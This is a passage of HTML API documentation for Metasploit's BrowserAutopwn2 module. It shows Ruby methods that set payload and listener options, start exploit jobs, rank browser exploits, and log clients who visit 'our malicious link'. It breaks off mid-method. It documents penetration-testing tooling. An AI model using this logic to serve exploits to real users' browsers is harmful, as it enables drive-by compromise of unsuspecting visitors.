<h3 class="signature " id="set_exploit_options-instance_method">
#<strong>set_exploit_options</strong>(xploit) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Modifies an exploits default datastore options. Some of them are user-configurable, some must be defined by BAP.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 123</span>
<span class='kw'>def</span> <span class='id identifier rubyid_set_exploit_options'>set_exploit_options</span><span class='lparen'>(</span><span class='id identifier rubyid_xploit'>xploit</span><span class='rparen'>)</span>
<span class='comment'># We could do a massive xploit.datastore.merge!(self.datastore), but this seems
</span> <span class='comment'># really expensive. Costs more loading time.
</span>
<span class='comment'># Set options configurable by the user.
</span> <span class='id identifier rubyid_p'>p</span> <span class='op'>=</span> <span class='id identifier rubyid_select_payload'>select_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_xploit'>xploit</span><span class='rparen'>)</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PAYLOAD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_p'>p</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='lbracket'>[</span><span class='symbol'>:payload_name</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_p'>p</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='lbracket'>[</span><span class='symbol'>:payload_lport</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_srvhost'>srvhost</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LHOST</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_get_payload_lhost'>get_payload_lhost</span>
<span class='qwords_beg'>%w(</span><span class='tstring_content'>JsObfuscate</span><span class='words_sep'> </span><span class='tstring_content'>CookieName</span><span class='words_sep'> </span><span class='tstring_content'>VERBOSE</span><span class='words_sep'> </span><span class='tstring_content'>Retries</span><span class='words_sep'> </span><span class='tstring_content'>SSL</span><span class='words_sep'> </span><span class='tstring_content'>SSLVersion</span><span class='words_sep'> </span><span class='tstring_content'>SSLCipher</span><span class='words_sep'> </span><span class='tstring_content'>URIHOST</span><span class='words_sep'> </span><span class='tstring_content'>URIPORT</span><span class='tstring_end'>)</span></span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_opt'>opt</span><span class='op'>|</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='id identifier rubyid_opt'>opt</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='id identifier rubyid_opt'>opt</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='id identifier rubyid_opt'>opt</span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='comment'># Set options only configurable by BAP.
</span> <span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DisablePayloadHandler</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BrowserProfilePrefix</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_browser_profile_prefix'>browser_profile_prefix</span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_assign_module_resource'>assign_module_resource</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WORKSPACE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_workspace'>workspace</span>
<span class='comment'># Register this module as a child and copy datastore options
</span> <span class='id identifier rubyid_xploit'>xploit</span><span class='period'>.</span><span class='id identifier rubyid_register_parent'>register_parent</span><span class='lparen'>(</span><span class='kw'>self</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="setup-instance_method">
#<strong>setup</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Sets up BAPv2. This is like our main function.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 464</span>
<span class='kw'>def</span> <span class='id identifier rubyid_setup'>setup</span>
<span class='id identifier rubyid_t1'>t1</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span>
<span class='kw'>super</span>
<span class='ivar'>@bap_exploits</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='ivar'>@exploit_job_ids</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='ivar'>@payload_job_ids</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='ivar'>@wanted_payloads</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='comment'># #split might be expensive if the file is really big
</span> <span class='ivar'>@whitelist</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>AllowedAddresses</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>?</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>AllowedAddresses</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span> <span class='op'>:</span> <span class='kw'>nil</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Searching BES exploits, please wait...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_init_exploits'>init_exploits</span>
<span class='id identifier rubyid_sort_bap_exploits'>sort_bap_exploits</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Starting exploit modules...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_start_exploits'>start_exploits</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Starting listeners...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_start_payload_listeners'>start_payload_listeners</span>
<span class='id identifier rubyid_t2'>t2</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Time spent: </span><span class='embexpr_beg'>#{</span><span class='lparen'>(</span><span class='id identifier rubyid_t2'>t2</span><span class='op'>-</span><span class='id identifier rubyid_t1'>t1</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_inspect'>inspect</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_configure_job_output'>configure_job_output</span><span class='lparen'>(</span><span class='kw'>true</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="show_exploit_list-instance_method">
#<strong>show_exploit_list</strong>(ip, tag, current_exploit_list) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Prints a list of suitable exploits for the current list.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#sort_bap_exploits-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#sort_bap_exploits (method)">Explains how the exploit list is generated at first.</a></span></li>
<li><span class='object_link'><a href="#get_suitable_exploits-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#get_suitable_exploits (method)">Explains how we serve exploits to each client.</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 624</span>
<span class='kw'>def</span> <span class='id identifier rubyid_show_exploit_list'>show_exploit_list</span><span class='lparen'>(</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span> <span class='id identifier rubyid_tag'>tag</span><span class='comma'>,</span> <span class='id identifier rubyid_current_exploit_list'>current_exploit_list</span><span class='rparen'>)</span>
<span class='id identifier rubyid_order'>order</span> <span class='op'>=</span> <span class='int'>1</span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='op'>::</span><span class='const'>Table</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Header</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Indent</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>1</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Columns</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Order</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>IP</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Exploit</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_current_exploit_list'>current_exploit_list</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>&lt;&lt;</span> <span class='lbracket'>[</span><span class='id identifier rubyid_order'>order</span><span class='comma'>,</span> <span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_shortname'>shortname</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_order'>order</span> <span class='op'>+=</span> <span class='int'>1</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_table'>table</span><span class='period'>.</span><span class='id identifier rubyid_rows'>rows</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>User </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'> (Tag: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tag'>tag</span><span class='embexpr_end'>}</span><span class='tstring_content'>) visited our malicious link, but no exploits found suitable.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='comment'># Update the exploit list data
</span> <span class='id identifier rubyid_log_click'>log_click</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='comma'>,</span> <span class='id identifier rubyid_table'>table</span><span class='period'>.</span><span class='id identifier rubyid_to_csv'>to_csv</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Exploits found suitable for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'> (Tag: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tag'>tag</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="show_ready_exploits-instance_method">
#<strong>show_ready_exploits</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Prints all the exploits that BAP will consider using. But this isnt the actual list of exploits that BAP will use for each target.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 512</span>
<span class='kw'>def</span> <span class='id identifier rubyid_show_ready_exploits'>show_ready_exploits</span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Order</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Rank</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Name</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Path</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Payload</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='comment'># If not verbose, you&#39;re not in dev mode.
</span> <span class='comment'># As an user, you shouldn&#39;t be using any of these paths anyway.
</span> <span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_delete'>delete</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Path</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='op'>!</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='op'>::</span><span class='const'>Table</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Header</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Exploits</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Indent</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='int'>1</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Columns</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_columns'>columns</span>
<span class='rparen'>)</span>
<span class='comment'># Without the order, sometimes the Rex table messes up even though in the array
</span> <span class='comment'># the order looks right. So don&#39;t get rid of this.
</span> <span class='id identifier rubyid_order'>order</span> <span class='op'>=</span> <span class='int'>1</span>
<span class='id identifier rubyid_bap_exploits'>bap_exploits</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_order'>order</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_parse_rank'>parse_rank</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_rank'>rank</span><span class='rparen'>)</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_shortname'>shortname</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>VERBOSE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PAYLOAD</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> on </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_table'>table</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_row'>row</span>
<span class='id identifier rubyid_order'>order</span> <span class='op'>+=</span> <span class='int'>1</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_line'>print_line</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The following is a list of exploits that BrowserAutoPwn will consider using.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Exploits with the highest ranking and newest will be tried first.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_line'>print_line</span>
<span class='id identifier rubyid_print_line'>print_line</span> <span class='id identifier rubyid_table'>table</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="sort_bap_exploits-instance_method">
#<strong>sort_bap_exploits</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Modifies @bap_exploits by sorting. The newest and with the highest ranking goes on top. This method is part of what makes BAP smarter. However, the list rearranged by this exploit will not actually be the same exploit list served to every client. When a client a request, #get_suitable_exploits will generate another list that will actually be used by the client by going through what we have here, and filter out all the exploit modules that dont match the targets requirements.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">See Also:</p>
<ul class="see">
<li><span class='object_link'><a href="#bap_exploits-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#bap_exploits (method)">The read-only attribute.</a></span></li>
<li><span class='object_link'><a href="#sort_date_in_group-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#sort_date_in_group (method)">The method for sorting by disclosure date</a></span></li>
<li><span class='object_link'><a href="#sort_group_by_rank-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#sort_group_by_rank (method)">The method for sorting by rank</a></span></li>
<li>The method for breaking the module list into groups</li>
<li><span class='object_link'><a href="#finalize_sorted_modules-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#finalize_sorted_modules (method)">The method for finalizing bap_exploits</a></span></li>
<li><span class='object_link'><a href="#get_suitable_exploits-instance_method" title="Msf::Exploit::Remote::BrowserAutopwn2#get_suitable_exploits (method)">#get_suitable_exploits</a></span></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
197
198
199
200
201
202</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 197</span>
<span class='kw'>def</span> <span class='id identifier rubyid_sort_bap_exploits'>sort_bap_exploits</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span> <span class='op'>=</span> <span class='id identifier rubyid_group_bap_modules'>group_bap_modules</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span> <span class='op'>=</span> <span class='id identifier rubyid_sort_date_in_group'>sort_date_in_group</span><span class='lparen'>(</span><span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='rparen'>)</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span> <span class='op'>=</span> <span class='id identifier rubyid_sort_group_by_rank'>sort_group_by_rank</span><span class='lparen'>(</span><span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='rparen'>)</span>
<span class='id identifier rubyid_finalize_sorted_modules'>finalize_sorted_modules</span><span class='lparen'>(</span><span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="sort_date_in_group-instance_method">
#<strong>sort_date_in_group</strong>(bap_groups) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Sorts a grouped module list by disclosure date.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>bap_groups</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A grouped module list.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash with each module list sorted by disclosure date.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
209
210
211
212
213
214
215
216</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 209</span>
<span class='kw'>def</span> <span class='id identifier rubyid_sort_date_in_group'>sort_date_in_group</span><span class='lparen'>(</span><span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='rparen'>)</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='period'>.</span><span class='id identifier rubyid_each_pair'>each_pair</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_ranking'>ranking</span><span class='comma'>,</span> <span class='id identifier rubyid_module_list'>module_list</span><span class='op'>|</span>
<span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='lbracket'>[</span><span class='id identifier rubyid_ranking'>ranking</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_module_list'>module_list</span><span class='period'>.</span><span class='id identifier rubyid_sort_by'>sort_by</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='id identifier rubyid_dstr'>dstr</span> <span class='op'>=</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_disclosure_date'>disclosure_date</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>1970-01-01</span><span class='tstring_end'>&quot;</span></span>
<span class='const'>Date</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_dstr'>dstr</span><span class='rparen'>)</span> <span class='kw'>rescue</span> <span class='const'>Date</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>1970-01-01</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_reverse'>reverse</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="sort_group_by_rank-instance_method">
#<strong>sort_group_by_rank</strong>(bap_groups) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Sorts a module list by ranking.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>bap_groups</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A grouped module list.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash grouped by ranking.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
223
224
225</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 223</span>
<span class='kw'>def</span> <span class='id identifier rubyid_sort_group_by_rank'>sort_group_by_rank</span><span class='lparen'>(</span><span class='id identifier rubyid_bap_groups'>bap_groups</span><span class='rparen'>)</span>
